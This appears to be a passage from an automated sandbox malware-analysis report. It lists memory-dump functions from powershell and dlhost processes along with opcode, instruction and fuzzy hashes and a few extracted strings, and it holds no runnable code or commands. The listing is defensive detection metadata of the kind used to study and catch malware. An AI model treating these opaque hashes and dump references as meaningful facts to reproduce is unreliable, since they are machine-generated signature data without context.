                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fea265a19d8c4bf3c4dc5d099afc48bbd3e4cc91134aee3a096b763ce928d272
                                                                • Instruction ID: d0fbc816cf949fd3017ab6b64ca8e97169e5a18e8799456acb59cf6b2ac76e7c
                                                                • Opcode Fuzzy Hash: fea265a19d8c4bf3c4dc5d099afc48bbd3e4cc91134aee3a096b763ce928d272
                                                                • Instruction Fuzzy Hash: 8741DF7081DBC44FE7569B28A845A523FF0FF52320F1506DFE088CB1A3D729A84AC792
                                                                Function 00007FF848F4A47C Relevance: .1, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2400600817.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ec722f977094ecfb8b795745c0affe9e8a8a63c52aaf4c3a26f2128bdd1bafd8
                                                                • Instruction ID: e16218015d0a3338b2ae601db53bc7da26a8fa8f22f868b2cbba011fc8ce8f63
                                                                • Opcode Fuzzy Hash: ec722f977094ecfb8b795745c0affe9e8a8a63c52aaf4c3a26f2128bdd1bafd8
                                                                • Instruction Fuzzy Hash: 0D213A3190CB4C4FDB59DB6C984A7E97FF0EBA6320F04426FD048C31A2DA74945ACB91
                                                                Function 00007FF848F433B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2400600817.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                • Instruction ID: 8501ce2366aa47fe50c32cae5305b62a305da60d827aaf0f190e9b8a75457062
                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                • Instruction Fuzzy Hash: 8B01447111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB26E882CB45

                                                                Non-executed Functions

                                                                Function 00007FF848F48BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2400600817.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: K_^4$K_^7$K_^F$K_^J
                                                                • API String ID: 0-377281160
                                                                • Opcode ID: 86845bd1d662db71689425d0d287ab41f2410a9a62aaf35f23a8626c076b002c
                                                                • Instruction ID: bead706383397ff6f8c4a37cb53810d507c8abccd64b99c06fffeb200d3c1acc
                                                                • Opcode Fuzzy Hash: 86845bd1d662db71689425d0d287ab41f2410a9a62aaf35f23a8626c076b002c
                                                                • Instruction Fuzzy Hash: 11213B7761A525AED7417B7CB8045DA3BA0DF982B8B4503B3D198CF053EA1C708786D4

                                                                Executed Functions

                                                                Function 00007FF848F40DFE Relevance: .8, Instructions: 833COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01898fed893962935ec64ad0511edd22d5b3b234d27f20eca635772b24a43e49
                                                                • Instruction ID: 4122b826e43245ac891625b27c4f8b5534cd78710b5c017e82164a95653e7698
                                                                • Opcode Fuzzy Hash: 01898fed893962935ec64ad0511edd22d5b3b234d27f20eca635772b24a43e49
                                                                • Instruction Fuzzy Hash: 41D1FC22A1E6965EE352B77C74551FA3FA0EF82778F0841B7D4CCCA093DE1C644683A9
                                                                Function 00007FF848F41D5E Relevance: .2, Instructions: 204COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 099c0eb952ea9b0883224248644143407f03afb5e69ed3f48861fe56c39cd235
                                                                • Instruction ID: 1972a90fe30f66e0db3916da7197a2aa31cd8a32b4045fc7c3aa51a5ff19d707
                                                                • Opcode Fuzzy Hash: 099c0eb952ea9b0883224248644143407f03afb5e69ed3f48861fe56c39cd235
                                                                • Instruction Fuzzy Hash: 8851C420A0E7C51FD787A7B898692657FE2DF9B660B0901FFD089CB1A7C94D4C4AC352
                                                                Function 00007FF848F411A0 Relevance: 3.0, Strings: 2, Instructions: 540COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: cAL_^$sAL_^
                                                                • API String ID: 0-3529376378
                                                                • Opcode ID: cd3a4c34947c93850428128a9e0f8107aa14d5e6b02686c45b7dcd83fcbf5c85
                                                                • Instruction ID: b03d3e9ec95570cb5856813ba9a77d18440923809331ce6c02af2f6fda99a4dc
                                                                • Opcode Fuzzy Hash: cd3a4c34947c93850428128a9e0f8107aa14d5e6b02686c45b7dcd83fcbf5c85
                                                                • Instruction Fuzzy Hash: EAF1DE30A2A91A8FE798FB2894553B977E2FF98780F54057AD00ED32D7DF2CA8418355
                                                                Function 00007FF848F41619 Relevance: 3.0, Strings: 2, Instructions: 503COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: cAL_^$sAL_^
                                                                • API String ID: 0-3529376378
                                                                • Opcode ID: 179f118383c6c7b44cf20b85456c432c776143489e1fcc9ff88a88c864213d3e
                                                                • Instruction ID: 27ac75a6acb8bb51b717463276d5416e257cfd3f2a725453808e8754665278ec
                                                                • Opcode Fuzzy Hash: 179f118383c6c7b44cf20b85456c432c776143489e1fcc9ff88a88c864213d3e
                                                                • Instruction Fuzzy Hash: ABF1CD30A1EA1A8FE798FB2894553B977A2FF98780F54057AD00ED32D7DF2CA8418355
                                                                Function 00007FF848F411A5 Relevance: .5, Instructions: 455COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bcedbd8ab01f2e5cb540f5322e049c45ea7a0bff2a71c01d0b08b3c016172b23
                                                                • Instruction ID: 6cd6c03abe7809010c0fd83565f0c07a89e42f8a71caef508601a1d581e80c7d
                                                                • Opcode Fuzzy Hash: bcedbd8ab01f2e5cb540f5322e049c45ea7a0bff2a71c01d0b08b3c016172b23
                                                                • Instruction Fuzzy Hash: 5E314F2291E6D65FE742A77CA8A10EA7FB0FF52258B4901B7C0858E0D3EE1C584A8359
                                                                Function 00007FF848F405D3 Relevance: .5, Instructions: 455COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4650838114d72a428babe0335defcda5926c680d7fd5cfdfdd69f8ac7caf3f4b
                                                                • Instruction ID: c72d1dce689850bc51d28f10555088ce31a55358dc257aecbe0f15acedb91b8b
                                                                • Opcode Fuzzy Hash: 4650838114d72a428babe0335defcda5926c680d7fd5cfdfdd69f8ac7caf3f4b
                                                                • Instruction Fuzzy Hash: D3D14532F1E5855FE380B76CA8551F97BA0EFE26A1F1804BBD08CC72D3DE1858068796
                                                                Function 00007FF848F41210 Relevance: .4, Instructions: 412COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 63ed5dffcb1c7a4cd4ff32699d86a77ebe50402420f4f7451483dfd718de3fc2
                                                                • Instruction ID: 24f88f8b147a5a8a628c52b8a3b7fade6a2fe97858b9d5ec88fb079d4bee6a0c
                                                                • Opcode Fuzzy Hash: 63ed5dffcb1c7a4cd4ff32699d86a77ebe50402420f4f7451483dfd718de3fc2
                                                                • Instruction Fuzzy Hash: 79019E2281EBEA4FE342A77888650EA7FB1FF52640F4900A7C086DB1D3DE2868498315
                                                                Function 00007FF848F404D3 Relevance: .3, Instructions: 301COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fbe58fe45811e58cedde66143fc21d85b6407f67af6c80386d15566c0a091c87
                                                                • Instruction ID: ba27686e9d2248e2b2597b9ca50b6c6cfa5f4bc4dd851372191aaea97ac23af6
                                                                • Opcode Fuzzy Hash: fbe58fe45811e58cedde66143fc21d85b6407f67af6c80386d15566c0a091c87
                                                                • Instruction Fuzzy Hash: 20712532B1A9155BD284BB6CB8562F9B7D1EFD53A6B04027BE04CCB183CE2C684683D5
                                                                Function 00007FF848F40FA0 Relevance: .2, Instructions: 225COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e149d1acc8d997f7d9ee0c3821cd734b8e1aff2cbf0e772a6113e830a1ce7eef
                                                                • Instruction ID: 65c23c1405d4fd64acf52aca61298169c33f9443b5fa6000b8134cc449e202c8
                                                                • Opcode Fuzzy Hash: e149d1acc8d997f7d9ee0c3821cd734b8e1aff2cbf0e772a6113e830a1ce7eef
                                                                • Instruction Fuzzy Hash: F751741791F162A9E25177BC74520EB6B60EF817BDF084277D1CC5D0939E1C248A86ED
                                                                Function 00007FF848F405FA Relevance: .2, Instructions: 170COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e332470eda0bb2eab81c671aedea842e12847f7a12cddb4a3070bb3b02f65d97
                                                                • Instruction ID: 57f1cc90ed3522bd76dec254fc1541a583e602c8b7ba088ee92c4ac52a5e6fe7
                                                                • Opcode Fuzzy Hash: e332470eda0bb2eab81c671aedea842e12847f7a12cddb4a3070bb3b02f65d97
                                                                • Instruction Fuzzy Hash: AA410431B1D9591FE684F76CA86A2B9B7C2EF99795F0401BBE04DC32D3DE185C428385
                                                                Function 00007FF848F40AFB Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d8f114bb31a83e95655627cd78cc7578724a01154688e293e9fcd7b79a133c7
                                                                • Instruction ID: 21488390f3ad1222929d478768341860486056ea3c3501dbc7cfca6fd487b2a8
                                                                • Opcode Fuzzy Hash: 2d8f114bb31a83e95655627cd78cc7578724a01154688e293e9fcd7b79a133c7
                                                                • Instruction Fuzzy Hash: D651EF31A1A51A9FE780BB6898552F977B1FF84354F40007AD009DB2D3DF2CA8468BA4
                                                                Function 00007FF848F40638 Relevance: .1, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f8cbdac74d102ae8ecb1a2a796e19462a24dfa41dc546571ed0dc7b740458f0
                                                                • Instruction ID: ea515952fb1eac9230c3122df921a310abf2f170b52db57c08583ae2825aed34
                                                                • Opcode Fuzzy Hash: 1f8cbdac74d102ae8ecb1a2a796e19462a24dfa41dc546571ed0dc7b740458f0
                                                                • Instruction Fuzzy Hash: 8631D731B1D9595FE688EB2C945A379B7C2EFA8791F0405BEE00EC32D7DE189C418345
                                                                Function 00007FF848F40C99 Relevance: .1, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e754526dcbd80f5d31d8068f7b9d46daa9faa97702ab4543fb0b52dfd2daaf4
                                                                • Instruction ID: 536190b6da8c4d68ee1d89be0b0e00ad60f2ce36ea2d5e0a4992a6f13624585c
                                                                • Opcode Fuzzy Hash: 9e754526dcbd80f5d31d8068f7b9d46daa9faa97702ab4543fb0b52dfd2daaf4
                                                                • Instruction Fuzzy Hash: AA31E221F2D9499FE784B7BC98093B976D2FF98A50F04027AE40CD32D3DE2C58458396
                                                                Function 00007FF848F41118 Relevance: .1, Instructions: 82COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f37285127bf5ea7bda1dc19903cbc8ce969c9aba7b317d84bd0027feef80459
                                                                • Instruction ID: 965e1d0ff72e9fbe47b19c62ff8481b3bbf31c4d32b7578125f8e1a510c5b3ee
                                                                • Opcode Fuzzy Hash: 7f37285127bf5ea7bda1dc19903cbc8ce969c9aba7b317d84bd0027feef80459
                                                                • Instruction Fuzzy Hash: 3A21D72291F5A2A9E252B77874521F73FA0EF427ACF0802B7D08C5D0E3DE1C644A829D
                                                                Function 00007FF848F41F21 Relevance: .0, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 432f29aedbb2d201ecfd9f57fe1281d2abe994a90efb739955a1c77b47fcf67a
                                                                • Instruction ID: 7b34480af208ea5dc226810ee53e99e7d569f775eb7111fc799a22acfad8f16f
                                                                • Opcode Fuzzy Hash: 432f29aedbb2d201ecfd9f57fe1281d2abe994a90efb739955a1c77b47fcf67a
                                                                • Instruction Fuzzy Hash: D4012B74D0D6950FE385B73858554357FF0DBE1690F0404ABE888D61D7EF0899868397
                                                                Function 00007FF848F415D9 Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b0a0aacf449f29343deff6fe6f07fd00f8e16791bcec4204a6b35b9c45b6f924
                                                                • Instruction ID: 1a618f8e6a8e6205487db511f1f8e1e9e867e6e174ed2671d5cf04f01af5ac3a
                                                                • Opcode Fuzzy Hash: b0a0aacf449f29343deff6fe6f07fd00f8e16791bcec4204a6b35b9c45b6f924
                                                                • Instruction Fuzzy Hash: 35F05C32C0C6A14FD362D718D850272BFE0EB95550F0D06FFD08CD60A3D76888458302
                                                                Function 00007FF848F41198 Relevance: .0, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2549274076.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 13df53526d64c338c9761d7648579a1a54b5367104a0ec60ff792639361284f3
                                                                • Instruction ID: 842c82776e8875b3a90e3ea7c9a2a06190be1db2bc0cfcf1f93a58bb43411b8d
                                                                • Opcode Fuzzy Hash: 13df53526d64c338c9761d7648579a1a54b5367104a0ec60ff792639361284f3
                                                                • Instruction Fuzzy Hash: 1DE07D31C1D8364EE2A1A61C70511F27BD0DF94698F0909B7D04CE21E1FD5D5C864289

                                                                Executed Functions

                                                                Function 00007FF848F30DFE Relevance: .8, Instructions: 820COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c610568e299544c8732ea6d3d3fabc0228c8bcb3096b6ceb00094f440a21aff
                                                                • Instruction ID: 3b53e8d93b88d8ac8e2d67994ecd6a0dd8853bef7bb93592198a76aa41c3f88c
                                                                • Opcode Fuzzy Hash: 3c610568e299544c8732ea6d3d3fabc0228c8bcb3096b6ceb00094f440a21aff
                                                                • Instruction Fuzzy Hash: B2D1D92291F6965FE352B77C68551F63FA0EF42768F0842B7D48CCE093DE1C644683A9
                                                                Function 00007FF848F31D5E Relevance: .2, Instructions: 204COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14be8f3e30b034cfbeb2f40aa0816d195d1e49fecc1f3e310654a41180f85474
                                                                • Instruction ID: 0bde7358d53ef4e02239588a13e4a661289eb4d98ee67964baaba3ff7cc5e537
                                                                • Opcode Fuzzy Hash: 14be8f3e30b034cfbeb2f40aa0816d195d1e49fecc1f3e310654a41180f85474
                                                                • Instruction Fuzzy Hash: E951B420A0E7C51FD787A77898692657FE2DF9B660B0941FFE089CB1A7CD494C4AC312
                                                                Function 00007FF848F30432 Relevance: 1.6, Strings: 1, Instructions: 348COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: X[H
                                                                • API String ID: 0-2007901431
                                                                • Opcode ID: 1ae7ef24e8d618e3e6706de92d1924baf6ba49e17e5b70d2b3bc61b0fd4ce041
                                                                • Instruction ID: f2194f67d8b8568e1daa0f301314cf968cd1ed104ac65ada764c7682eea11657
                                                                • Opcode Fuzzy Hash: 1ae7ef24e8d618e3e6706de92d1924baf6ba49e17e5b70d2b3bc61b0fd4ce041
                                                                • Instruction Fuzzy Hash: B9810322B1E9595FD344B72CB8551F9BB91EFC63A6B0803BBE04CCB193CE1C68468795
                                                                Function 00007FF848F311A0 Relevance: .5, Instructions: 540COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 338982294d5ea53584a7fc8dd432da2439d797392381fb7565f60230c8cb6248
                                                                • Instruction ID: f7d20c4da980771f2f85a6daa6f060dd83dfd856e15488dfec8323d874056076
                                                                • Opcode Fuzzy Hash: 338982294d5ea53584a7fc8dd432da2439d797392381fb7565f60230c8cb6248
                                                                • Instruction Fuzzy Hash: 7BF1B230B1E90A9FE798F72894557B9B7E2FF88780F54057AE00DC32D6DE2CA8418755
                                                                Function 00007FF848F31619 Relevance: .5, Instructions: 503COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bbcd135a7087a73b5f865f467466e68c0706ab82f852a5d591b311d7c79de93d
                                                                • Instruction ID: cecc85df767c7c6e5fd4479dfa1f5a39fcd6a89f34db664cc97d69fd5115f87f
                                                                • Opcode Fuzzy Hash: bbcd135a7087a73b5f865f467466e68c0706ab82f852a5d591b311d7c79de93d
                                                                • Instruction Fuzzy Hash: DDF1B130A1D90A5FE798FB2894597B9B7E2FF88380F54057AE00EC32D7DF29A8418755
                                                                Function 00007FF848F311A5 Relevance: .5, Instructions: 456COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 53dabcd06e4d1de578bc5cd09cbeb6310d2d3fc91bc578875797bc89de32aea1
                                                                • Instruction ID: ce1f4ca79cc2ffcef6c1be26c22b00e546a3f3d9bfcb7963b27c46171f865b3c
                                                                • Opcode Fuzzy Hash: 53dabcd06e4d1de578bc5cd09cbeb6310d2d3fc91bc578875797bc89de32aea1
                                                                • Instruction Fuzzy Hash: 6A31412291E6D59FE742B778A8A60E67FB0EF42258F4802F7D1858E0D3DE1C544A8359
                                                                Function 00007FF848F305D3 Relevance: .4, Instructions: 425COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 48862153ae0d4846fd6e8f3806501da59b1d309294731e9bc0e510e67c452f03
                                                                • Instruction ID: 9316fb3fe92660ef028832cd6861ad5da9f271ee4ec4a1da4d450500d77065a5
                                                                • Opcode Fuzzy Hash: 48862153ae0d4846fd6e8f3806501da59b1d309294731e9bc0e510e67c452f03
                                                                • Instruction Fuzzy Hash: A1C14532B1EA895FE344B72CA8591B9BBE0EFD53A1F1406BBD04CC72C3DE1868068355
                                                                Function 00007FF848F31210 Relevance: .4, Instructions: 412COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dd8e04a059802e5b8dd941b2541b87813e6ab20e4ac74d2386b2dfcb793067de
                                                                • Instruction ID: cf099223c85e3058bb78fc75fd064c71d0fcb1b6c63600440632ae7ea1a8c74d
                                                                • Opcode Fuzzy Hash: dd8e04a059802e5b8dd941b2541b87813e6ab20e4ac74d2386b2dfcb793067de
                                                                • Instruction Fuzzy Hash: 0001B132C1EBDA4FE382A77898650EA7FB1FF42240F4900E7D086CB1D3DE18684A8315
                                                                Function 00007FF848F304D3 Relevance: .3, Instructions: 301COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 34a356fd4ad0428ef85e11ec387d815698c826da044b743e8aa19e44bfaff53a
                                                                • Instruction ID: 397d296428948b2d3aa63a00b4b402a9b658f9c5b372c27a3b18b3f56333dd8b
                                                                • Opcode Fuzzy Hash: 34a356fd4ad0428ef85e11ec387d815698c826da044b743e8aa19e44bfaff53a
                                                                • Instruction Fuzzy Hash: 4C71F432B1A91D5BD644BB2CB8552F9B7D1EFD53A6F0403BBE04CCB183CE2868468695
                                                                Function 00007FF848F30FA0 Relevance: .2, Instructions: 210COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1ac0175d2e12eadb10d613fd887b45f9570278bf5aa07895a866f4cc8b34580
                                                                • Instruction ID: b8adec6428f80f6040981d74237692a328a43b7c55efb5fb12809ec7ec091e33
                                                                • Opcode Fuzzy Hash: c1ac0175d2e12eadb10d613fd887b45f9570278bf5aa07895a866f4cc8b34580
                                                                • Instruction Fuzzy Hash: 3E51332792F166A5E65277B874521EB2B64EF417BDF084377E0CC4D0939E1C248982AD
                                                                Function 00007FF848F305FA Relevance: .2, Instructions: 170COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
